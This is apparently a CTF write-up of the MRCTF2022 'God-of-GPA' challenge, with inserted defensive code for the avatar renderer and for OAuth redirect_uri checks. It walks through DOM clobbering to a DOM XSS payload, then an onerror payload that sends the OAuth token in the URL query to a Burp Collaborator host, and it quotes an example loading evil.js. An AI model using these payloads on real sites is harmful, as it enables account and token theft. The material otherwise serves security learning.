MRCTF2022

http://brtserver.node2.buptmerak.cn/signin

I didn't play this CTF over the weekend; I heard there was an XSS challenge, so now that I have some time I'm taking a look.

God-of-GPA

Register an account: jackma / 123

It feels like there's an XSS here:

```html
<script>
let Img = window.MyImg || {src: 'https://md.buptmerak.cn/uploads/upload_d12a3804a813ffb14fe38a318d6bfcf1.png'}
let Container = document.createElement("div");
Container.innerHTML = '<img class="avatar" src="' + Img.src + '">';
document.body.appendChild(Container);
</script>
```

https://developer.mozilla.org/zh-CN/docs/Web/API/Node/appendChild

Can we control window.MyImg? If so, wouldn't that give us a DOM XSS?

But how do we control window.MyImg?

That reminded me of DOM clobbering, which I'd read about before.

Time to study DOM clobbering:

https://portswigger.net/web-security/dom-based/dom-clobbering

You can see that this challenge is very similar to the example in that tutorial.

Next I read zeddyu's article:

https://blog.zeddyu.info/2020/03/04/Dom-Clobbering/

Below I've pulled in the relevant explanation from PortSwigger directly.

How to exploit DOM-clobbering vulnerabilities

A common pattern used by JavaScript developers is:

```javascript
var someObject = window.someObject || {};
```

If you can control some of the HTML on the page, you can clobber the someObject reference with a DOM node, such as an anchor. Consider the following code:

```html
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
```

To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:

```html
<a id=someObject><a id=someObject name=url href=//malicious-website.com/evil.js>
```

As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.

I'm sure that by this point everyone has a rough idea of how to attack this challenge.

I built the following payload locally:

```html
<body>
<a id=MyImg>
<a id=MyImg name=src href="666">
<script>
let Img = window.MyImg || {src: 'https://md.buptmerak.cn/uploads/upload_d12a3804a813ffb14fe38a318d6bfcf1.png'}
let Container = document.createElement("div");
Container.innerHTML = '<img class="avatar" src="' + Img.src + '">';
document.body.appendChild(Container);
</script>
</body>
```

which produced:

```html
<div>
<img class="avatar" src="file:///E:/js/666">
</div>
```

The src was successfully changed.

Payload:

```html
<a id=MyImg><a id=MyImg name=src href="cid:&quot;onerror=alert(1)//">
```
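To make the defender's side of this concrete, here is an added example (my own code, not the challenge's or the writeup's) that reproduces why the `window.MyImg || {...}` pattern above is clobberable and shows a hardened replacement. There is no real DOM in Node, so the clobbered value is a constructed stand-in: two anchors with the same `id` make `window.MyImg` an HTMLCollection whose named item `src` is the second anchor, and an anchor's `toString()` returns its resolved `href`. That is also why the writeup's local test with `href="666"` came back as `file:///E:/js/666` (resolved against the document's base) and why the final payload uses a scheme-prefixed `cid:` value. The default avatar URL and the allow-listed host are assumptions for the example.

```javascript
// Added example, not code from the challenge or the original writeup.
// Demonstrates the clobberable pattern and a hardened version.

const DEFAULT_SRC = 'https://example.invalid/default-avatar.png'; // constructed placeholder

// Vulnerable: trusts whatever window.MyImg holds and concatenates it into markup.
function renderAvatarVulnerable(win) {
  const img = win.MyImg || { src: DEFAULT_SRC };
  return '<img class="avatar" src="' + img.src + '">';
}

// Hardened:
//  1. Only accept a plain object, never a DOM node or HTMLCollection.
//  2. Only accept a string src with an https scheme and an allow-listed host.
//  3. Escape for the attribute context anyway (defence in depth).
const ALLOWED_HOSTS = new Set(['md.buptmerak.cn']); // assumption: where avatars are hosted

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && Object.getPrototypeOf(v) === Object.prototype;
}

function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function pickAvatarSrc(win) {
  const cfg = win.MyImg;
  if (!isPlainObject(cfg) || typeof cfg.src !== 'string') return DEFAULT_SRC;
  let u;
  try { u = new URL(cfg.src); } catch { return DEFAULT_SRC; }
  if (u.protocol !== 'https:' || !ALLOWED_HOSTS.has(u.hostname)) return DEFAULT_SRC;
  return u.href;
}

function renderAvatarHardened(win) {
  return '<img class="avatar" src="' + escapeAttr(pickAvatarSrc(win)) + '">';
}

// Constructed stand-ins for what `<a id=MyImg><a id=MyImg name=src href=...>` produces:
// window.MyImg becomes a collection whose named item `src` is the second anchor, and
// string concatenation calls the anchor's toString(), which yields its href.
class FakeAnchor {
  constructor(href) { this.href = href; }
  toString() { return this.href; }
}
class FakeHTMLCollection {
  constructor(named) { Object.assign(this, named); }
}

function clobberedWindow(href) {
  return { MyImg: new FakeHTMLCollection({ src: new FakeAnchor(href) }) };
}

// Stand-alone demonstration with the writeup's payload value.
const demo = clobberedWindow('cid:"onerror=alert(1)//');
console.log('vulnerable:', renderAvatarVulnerable(demo));
console.log('hardened:  ', renderAvatarHardened(demo));
```

The plain-object check is what actually closes the clobbering hole: an HTMLCollection or an element never has `Object.prototype` as its direct prototype, so the fallback wins. The scheme/host allow-list and the attribute escaping are independent layers, so even a legitimately set `window.MyImg` with an odd value cannot break out of the `src` attribute.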

Next, I had to think about how to get the flag.

We can now do XSS. We found that the site uses OAuth for authentication.

I took a look with F12 (the dev tools).

What's stored in the cookie looks like a token; can we find a way to grab it?

```text
s:LSr-HmP6ei-vlHd6bhypbfVcy-tcuf1u.E0UpQsNSFuW+jDPhGUxC845rhVCZKjeLYW2wtr7vq4Y
```

Or could we just have the admin click on the GPA page, send it to my server, and then XS-Leak it out?

Then I noticed that during authentication the following requests are made:

```http
GET /oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/login HTTP/1.1
GET /login?token=TCHa62XCtDG7DmjKG4w2KSj1paWaZ1aX HTTP/1.1
```

and then it logs in carrying the token.

I tried to see whether I could get hold of my own token.

I found that putting my VPS in directly gives `redirect_uri unmatched`, hmm…

How to get around that? Add a /login?

```http
GET /oauth/authorize?redirect_uri=https://0abcw6idy8id19y0dsddg11ycpig65.burpcollaborator.net
```

Still doesn't seem to work? Then it occurred to me:

```http
GET /oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/login&redirect_uri=http://0abcw6idy8id19y0dsddg11ycpig65.burpcollaborator.net/ HTTP/1.1
```

Damn, it errored out...

Need to think of a way to bypass it:

https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect
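The probes above (an unregistered host, a duplicated `redirect_uri` parameter, and later a different path on the client's own origin) are exactly the cases an authorization server's `redirect_uri` check has to refuse. As an added example (my own code, not the challenge's implementation, which is not shown on this page), here is a validation routine that does so. The client registration table, the `client_id` value and the error names are assumptions for the example; the registered URI is the one seen in the writeup's request.

```javascript
// Added example, not code from the challenge or the original writeup:
// strict redirect_uri validation for an OAuth authorization endpoint.

// Constructed client registry; the real server's registration is unknown.
const CLIENTS = {
  brtclient: { redirectUris: ['http://brtclient.node2.buptmerak.cn/login'] },
};

// Returns { ok: true, redirectUri } on success or { ok: false, reason } otherwise.
function validateAuthorizeRequest(clientId, rawQuery) {
  const client = CLIENTS[clientId];
  if (!client) return { ok: false, reason: 'unknown_client' };

  const params = new URLSearchParams(rawQuery);
  const values = params.getAll('redirect_uri');
  // A repeated parameter is a classic way to split "checked" from "used";
  // refuse the request instead of picking the first or the last value.
  if (values.length !== 1) return { ok: false, reason: 'redirect_uri_count' };

  let candidate;
  try {
    candidate = new URL(values[0]);
  } catch {
    return { ok: false, reason: 'redirect_uri_unparseable' };
  }
  if (candidate.hash !== '') return { ok: false, reason: 'redirect_uri_fragment' };

  // Exact comparison of the normalised URL against the registered value:
  // no prefix, substring or same-origin matching, so /view/<id> on the
  // client's own host does not pass either.
  const match = client.redirectUris.find((r) => r === candidate.href);
  if (!match) return { ok: false, reason: 'redirect_uri_unmatched' };
  return { ok: true, redirectUri: match };
}

// Stand-alone demonstration with the request shapes from the writeup
// (the collaborator host is replaced by a placeholder).
for (const q of [
  'redirect_uri=http://brtclient.node2.buptmerak.cn/login',
  'redirect_uri=https://attacker.invalid/',
  'redirect_uri=http://brtclient.node2.buptmerak.cn/login&redirect_uri=https://attacker.invalid/',
  'redirect_uri=http://brtclient.node2.buptmerak.cn/view/85d7da5b-b8a2-4734-95cb-6e654f77ab61',
]) {
  console.log(q, '=>', JSON.stringify(validateAuthorizeRequest('brtclient', q)));
}
```

Exact matching is only half the fix for what this writeup does: the client still receives its credential as `/login?token=...`, which is precisely what `window.location.search` leaks from an XSS on that origin. Delivering an authorization code (with PKCE) to a single registered callback, rather than a bearer token in the query string, removes that second half.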

So could we redirect to one of its own pages and plant another XSS there?

```html
<a id=MyImg>
<a id=MyImg name=src href="cid:&quot;onerror=window.location='http://0abcw6idy8id19y0dsddg11ycpig65.burpcollaborator.net'+window.location.search.substring(1)//">
```

This is the page being redirected to (it holds the payload above):

```text
http://brtserver.node2.buptmerak.cn/oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/view/85d7da5b-b8a2-4734-95cb-6e654f77ab61
```

Then another page that jumps to the redirect:

```html
<a id=MyImg>
<a id=MyImg name=src href="cid:&quot;onerror=window.location='http://brtserver.node2.buptmerak.cn/oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/view/85d7da5b-b8a2-4734-95cb-6e654f77ab61'//">
```

which gives:

```text
/view/17c8aa93-827d-4c47-b525-a1e1d824a003
```

Not sure why it errors out, choa!~

I tried the official writeup's approach too and it also failed, so never mind; the idea is exactly the same, haha.

The official writeup also has several more interesting approaches:

https://ibukifalling.github.io/2022/04/25/God-of-GPA-WP/

Summary

Learned quite a lot; feels great! Very satisfying.